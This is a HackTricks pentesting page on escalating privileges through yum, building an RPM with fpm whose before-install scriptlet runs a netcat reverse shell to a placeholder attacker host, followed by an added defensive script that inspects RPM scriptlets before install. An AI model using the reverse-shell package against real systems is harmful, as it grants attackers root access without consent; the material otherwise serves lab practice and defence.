hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Further examples around yum can also be found on gtfobins.

Executing arbitrary commands via RPM Packages

Checking the Environment

In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.

A working example of this vector

A working example of this exploit can be found in the daily bugle room on tryhackme.

Packing an RPM

In the following section, I will cover packaging a reverse shell into an RPM using fpm.

The example below creates a package that carries a before-install scriptlet containing a script of the attacker's choosing. When the package is installed, that scriptlet runs with the privileges of the installing user (root, in this scenario). I've used a simple netcat reverse shell for demonstration, but the command can be changed as necessary.

EXPLOITDIR=$(mktemp -d)                      # scratch directory that becomes the package payload
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'   # command placed in the before-install scriptlet
RPMNAME="exploited"
echo "$CMD" > "$EXPLOITDIR/beforeinstall.sh"
fpm -n "$RPMNAME" -s dir -t rpm -a all --before-install "$EXPLOITDIR/beforeinstall.sh" "$EXPLOITDIR"

Catching a shell

Using the above example, and assuming yum can be executed as a higher-privileged user:

  1. Transfer the RPM to the target host
  2. Start a listener on your local host, such as a netcat listener
  3. Install the crafted package: yum localinstall -y exploited-1.0-1.noarch.rpm
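The defensive counterpart to the procedure above is to read a package's scriptlets before it is ever handed to yum localinstall as root. The script below is an added example, not part of the original page: it parses the output of rpm -qp --scripts, isolates the scriptlets that run at install time (the --before-install hook from fpm becomes a preinstall scriptlet), and flags the package for review. The sample output is constructed; the inspect_rpm wrapper is a hypothetical name and needs the rpm binary.

```shell
#!/bin/sh
# Added example, not from the original page: review the scriptlets inside
# an RPM before it is installed as root. SAMPLE is constructed to mirror
# what `rpm -qp --scripts` prints for a package built with fpm's
# --before-install option (one preinstall scriptlet) plus a postinstall one.
SAMPLE='preinstall scriptlet (using /bin/sh):
echo "this body runs as root before any file is unpacked"
postinstall scriptlet (using /bin/sh):
ldconfig'

# rpm prints a header such as "preinstall scriptlet (using /bin/sh):"
# before each body. Print the scriptlet kinds found on stdin, one per line.
scriptlet_types() {
    sed -n -E 's/^(pre|post)(install|uninstall|trans) scriptlet.*$/\1\2/p'
}

# Print only the bodies of scriptlets that run at install time
# (pre/post install and pre/post trans); uninstall hooks are skipped.
install_time_bodies() {
    awk '/^(pre|post)(install|trans) scriptlet/ { keep = 1; next }
         /^(pre|post)uninstall scriptlet/       { keep = 0; next }
         keep { print }'
}

# Exit 0 when the output on stdin carries any non-empty install-time
# scriptlet body (the package must be read before installing), else 1.
needs_review() {
    n=$(install_time_bodies | grep -c -v '^[[:space:]]*$' || true)
    [ "$n" -gt 0 ]
}

# Live wrapper (hypothetical name) for a real file; requires the rpm binary.
inspect_rpm() {
    rpm -qp --scripts "$1" | install_time_bodies
}

# Demonstration on the constructed sample.
printf '%s\n' "$SAMPLE" | scriptlet_types
if printf '%s\n' "$SAMPLE" | needs_review; then
    echo "review before installing: install-time scriptlet present"
fi
```

Run inspect_rpm on an untrusted file to see exactly what would execute as root; a package with no install-time scriptlets produces no output and needs_review returns 1.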